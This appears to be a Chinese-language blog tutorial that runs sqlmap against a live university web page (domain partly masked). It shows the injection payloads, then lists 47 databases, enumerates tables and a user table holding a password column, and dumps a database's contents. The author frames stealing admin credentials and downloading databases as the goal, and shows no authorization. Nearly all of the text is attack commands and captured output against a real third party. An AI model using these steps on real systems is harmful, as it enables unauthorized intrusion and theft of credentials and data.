SQL注入是啥就不解释了。下面演示一个SQL注入的例子
SQL注入点可以自己尝试或用SQL注入漏洞扫描工具去寻找,这里用大名鼎鼎的sqlmap演示一个现成的案例。
1.漏洞试探
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:16:27 [12:16:27] [INFO] resuming back-end DBMS 'microsoft sql server' [12:16:27] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=87'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=87' WAITFOR DELAY '0:0:5'-- --- [12:16:27] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:16:27] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn' [*] shutting down at 12:16:27
可以看到这个站点是有SQL注入点的,连系统/应用/sql类型都爆出来了。接下来我们来探索一下这个数据库里有些什么。
2.查看数据库
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 --dbs ... sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=87'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=87' WAITFOR DELAY '0:0:5'-- --- [12:16:59] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:16:59] [INFO] fetching database names [12:16:59] [INFO] fetching number of databases [12:16:59] [INFO] resumed: 47 [12:16:59] [INFO] resumed: BZBB_lw [12:16:59] [INFO] resumed: ChualgXinNS [12:16:59] [INFO] resumed: db_dike [12:16:59] [INFO] resumed: db_dndqjzw [12:16:59] [INFO] resumed: db_njsdjw [12:16:59] [INFO] resumed: db_njsfsy [12:16:59] [INFO] resumed: db_nsddlhj [12:16:59] [INFO] resumed: db_nsdhgxn [12:16:59] [INFO] resumed: db_nsdmba [12:16:59] [INFO] resumed: db_nsdMediaC [12:16:59] [INFO] resumed: db_nsdscw [12:16:59] [INFO] resumed: db_nsdsw [12:16:59] [INFO] resumed: db_nsdswyy [12:16:59] [INFO] resumed: db_nsdswzy [12:16:59] [INFO] resumed: db_nyspjc [12:16:59] [INFO] resumed: db_sdjxjy [12:16:59] [INFO] resumed: db_spaqjc [12:16:59] [INFO] resumed: JiaoCai [12:16:59] [INFO] resumed: maste@ [12:16:59] [INFO] resumed: MBA [12:16:59] [INFO] resumed: model [12:16:59] [INFO] resumed: msdb [12:16:59] [INFO] resumed: njnulab [12:16:59] [INFO] resumed: njnupj [12:16:59] [INFO] resumed: nju [12:16:59] [INFO] resumed: nju2222 [12:16:59] [INFO] resumed: njuold [12:16:59] [INFO] resumed: njupj2012 [12:16:59] [INFO] resumed: Northwind [12:16:59] [INFO] resumed: NSD_ApplicationChemical [12:16:59] [INFO] resumed: NSD_Cnooc [12:16:59] [INFO] resumed: NSD_ElectricalEngineering [12:16:59] [INFO] resumed: NSD_ElectronicInformation [12:16:59] [INFO] resumed: NSD_TeacherSkills [12:16:59] [INFO] resumed: NSD_TeachingTeam [12:16:59] [INFO] resumed: nsddky_sy [12:16:59] [INFO] resumed: nsdsfjdzx [12:16:59] [INFO] resumed: nsdsfjdzxnew [12:16:59] [INFO] resumed: nsglxt [12:16:59] [INFO] resumed: NSHuaKe [12:16:59] [INFO] resumed: NSXinLiXue [12:16:59] [INFO] resumed: NY_JG [12:16:59] [INFO] resumed: pubs [12:16:59] [INFO] resumed: ShangXueYuannew [12:16:59] [INFO] resumed: tempdb [12:16:59] [INFO] resumed: zhongxin [12:16:59] [INFO] resumed: zhongxinold available databases [47]: [*] BZBB_lw [*] ChualgXinNS [*] db_dike [*] db_dndqjzw [*] db_njsdjw [*] db_njsfsy [*] db_nsddlhj [*] db_nsdhgxn [*] db_nsdmba [*] db_nsdMediaC [*] db_nsdscw [*] db_nsdsw [*] db_nsdswyy [*] db_nsdswzy [*] db_nyspjc [*] db_sdjxjy [*] db_spaqjc [*] JiaoCai [*] maste@ [*] MBA [*] model [*] msdb [*] njnulab [*] njnupj [*] nju [*] nju2222 [*] njuold [*] njupj2012 [*] Northwind [*] NSD_ApplicationChemical [*] NSD_Cnooc [*] NSD_ElectricalEngineering [*] NSD_ElectronicInformation [*] NSD_TeacherSkills [*] NSD_TeachingTeam [*] nsddky_sy [*] nsdsfjdzx [*] nsdsfjdzxnew [*] nsglxt [*] NSHuaKe [*] NSXinLiXue [*] NY_JG [*] pubs [*] ShangXueYuannew [*] tempdb [*] zhongxin [*] zhongxinold [12:16:59] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn' [*] shutting down at 12:16:59
3.省略部分日志,可以看到所有的数据库都已经找到了,接下来可以查看具体的表。
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D JiaoCai --tables --threads 5 ... [12:18:44] [INFO] resuming back-end DBMS 'microsoft sql server' [12:18:44] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=87'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=87' WAITFOR DELAY '0:0:5'-- --- [12:18:45] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:18:45] [INFO] fetching tables for database: JiaoCai [12:18:45] [INFO] fetching number of tables for database 'JiaoCai' [12:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [12:18:45] [INFO] retrieved: [12:18:46] [WARNING] reflective value(s) found and filtering out 23 [12:18:58] [INFO] retrieved: dbo.dtproperties [12:21:19] [INFO] retrieved: dbo.sysconstraints [12:23:12] [INFO] retrieved: dbo.syssegments [12:24:48] [INFO] retrieved: dbo.T_BuildYxJc [12:28:11] [INFO] retrieved: dbo.T_BuildZdJc [12:30:01] [INFO] retrieved: dbo.T_CanYu [12:30:44] [INFO] retrieved: dbo.T_EndDate [12:31:44] [INFO] retrieved: dbo.T_G_BuildYxJc [12:33:25] [INFO] retrieved: dbo.T_G_Bu [12:34:13] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [12:34:44] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request ildZdJc [12:35:31] [INFO] retrieved: dbo.T_G_Ca [12:37:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request nYu [12:38:58] [INFO] retrieved: dbo.T_G_EndDate [12:40:49] [INFO] retrieved: dbo.T_G_JiaoCai [12:42:38] [INFO] retrieved: dbo.T_G_News [12:43:17] [INFO] retrieved: dbo.T_G_User [12:45:51] [INFO] retrieved: dbo.T_G_XueYuan [12:47:55] [INFO] retrieved: dbo.T_G_ZhuanYe [12:49:35] [INFO] retrieved: dbo.T_G_ZyToJc [12:50:48] [INFO] retrieved: dbo.T_JiaoCai [12:52:08] [INFO] retrieved: dbo.T_News [12:53:21] [INFO] retrieved: dbo.T_U [12:55:32] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request ser [12:55:55] [INFO] retrieved: dbo.T_XueYuan [12:56:43] [INFO] retrieved: dbo.T_ZhuanYe [12:59:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:00:05] [INFO] retrieved: dbo.T_ZyToJc Database: JiaoCai [23 tables] +----------------+ | T_BuildYxJc | | T_BuildZdJc | | T_CanYu | | T_EndDate | | T_G_BuildYxJc | | T_G_BuildZdJc | | T_G_CanYu | | T_G_EndDate | | T_G_JiaoCai | | T_G_News | | T_G_User | | T_G_XueYuan | | T_G_ZhuanYe | | T_G_ZyToJc | | T_JiaoCai | | T_News | | T_User | | T_XueYuan | | T_ZhuanYe | | T_ZyToJc | | dtproperties | | sysconstraints | | syssegments | +----------------+ [13:01:44] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1473 times [13:01:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn' [*] shutting down at 13:01:44
4.找到自己想要的表,如果你找到了存放user和passwd的表,那么你就可以后台登录他们的管理系统了。
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew -T T_User --columns --threads 5 ... HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=87'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=87' WAITFOR DELAY '0:0:5'-- --- [13:00:51] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [13:00:51] [INFO] fetching columns for table 'T_User' in database 'ShangXueYuannew' [13:00:51] [INFO] retrieved: [13:00:52] [WARNING] reflective value(s) found and filtering out 7 [13:00:55] [INFO] retrieving the length of query output [13:00:55] [INFO] retrieved: 9 [13:01:17] [INFO] retrieved: FileTheme [13:01:17] [INFO] retrieving the length of query output [13:01:17] [INFO] retrieved: 7 [13:02:06] [INFO] retrieved: varchar [13:02:06] [INFO] retrieving the length of query output [13:02:06] [INFO] retrieved: 3 [13:02:19] [INFO] retrieved: Pwd [13:02:19] [INFO] retrieving the length of query output [13:02:19] [INFO] retrieved: 7 [13:03:11] [INFO] retrieved: varchar [13:03:11] [INFO] retrieving the length of query output [13:03:11] [INFO] retrieved: 4 [13:03:27] [INFO] retrieved: Role [13:03:27] [INFO] retrieving the length of query output [13:03:27] [INFO] retrieved: 7 [13:03:44] [INFO] retrieved: varchar [13:03:44] [INFO] retrieving the length of query output [13:03:44] [INFO] retrieved: 8 [13:04:13] [INFO] retrieved: UserFile [13:04:13] [INFO] retrieving the length of query output [13:04:13] [INFO] retrieved: 7 [13:04:32] [INFO] retrieved: varchar [13:04:32] [INFO] retrieving the length of query output [13:04:32] [INFO] retrieved: 6 [13:06:21] [INFO] retrieved: UserId [13:06:21] [INFO] retrieving the length of query output [13:06:21] [INFO] retrieved: 7 [13:07:14] [INFO] retrieved: varcha_ 6/7 (86%) [13:07:46] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:07:46] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads') [13:08:17] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:09:18] [INFO] retrieved: varchar [13:09:18] [INFO] retrieving the length of query output [13:09:18] [INFO] retrieved: 8 [13:09:52] [INFO] retrieved: UserName [13:09:52] [INFO] retrieving the length of query output [13:09:52] [INFO] retrieved: 7 [13:10:36] [INFO] retrieved: va_cha_ 5/7 (71%) [13:11:06] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:11:07] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:12:07] [INFO] retrieved: varchar [13:12:07] [INFO] retrieving the length of query output [13:12:07] [INFO] retrieved: 6 [13:12:35] [INFO] retrieved: UserNo [13:12:35] [INFO] retrieving the length of query output [13:12:35] [INFO] retrieved: 3 [13:12:46] [INFO] retrieved: int Database: ShangXueYuannew Table: T_User [7 columns] +-----------+---------+ | Column | Type | +-----------+---------+ | FileTheme | varchar | | Pwd | varchar | | Role | varchar | | UserFile | varchar | | UserId | varchar | | UserName | varchar | | UserNo | int | +-----------+---------+ [13:12:46] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 727 times [13:12:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn' [*] shutting down at 13:12:46
5.甚至你可以把想要的数据库下载下来,在本地慢慢研究
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew --dump --threads 5
时间相当长,完了后就能看到SQL的具体内容了。
Database: ShangXueYuannew Table: T_Acceptance [10 entries] +-----+-----+------------+------------+------------+------------+---------------------------+--------+ | aId | aNo | aRar | aPdf | aWord | aFlash | aTitle | aState | +-----+-----+------------+------------+------------+------------+---------------------------+--------+ | NULL | 1 | 969655.rar | NULL | NULL | NULL | NULL | -502 | | 0 | 11 | NULL | 481991.pdf | 481991.doc | 159067.swf | 江苏省高等学校实验教学示范中心2011年验收申请表 | -501 | | 0 | 12 | NULL | 520703.pdf | 520703.doc | 520703.swf | 江苏省高等学校基础课实验教学示范中心立项申报表 | -501 | | 0 | 13 | NULL | 771297.pdf | 771297.doc | 448373.swf | 支撑材料之一:经济管理教学实验中心整体介绍 | -501 | | 0 | 14 | NULL | 493219.pdf | 349602.doc | 493219.swf | 支撑材料之二:实验室相关政策措施及规章制度 | -501 | | 0 | 15 | NULL | 882516.pdf | 559592.doc | 559592.swf | 支撑材料之三:课程实验教学计划及实验项目 | -501 | | 0 | 16 | NULL | 783892.pdf | 917744.doc | 138044.swf | 支撑材料之四:典型自编课程实验讲义 | -501 | | 0 | 17 | NULL | 332145.pdf | 593306.doc | 332145.swf | 支撑材料之五:典型多媒体课件简介 | -501 | | 0 | 18 | NULL | 811424.pdf | 811424.doc | 811424.swf | 支撑材料之߸ߢ经济ߢ理教学实验中心建设成果 | -501 | | NULL | 2 | 241811.rar | NULL | NULL | NULL | NULL | -503 | +-----+-----+------------+------------+------------+------------+---------------------------+--------+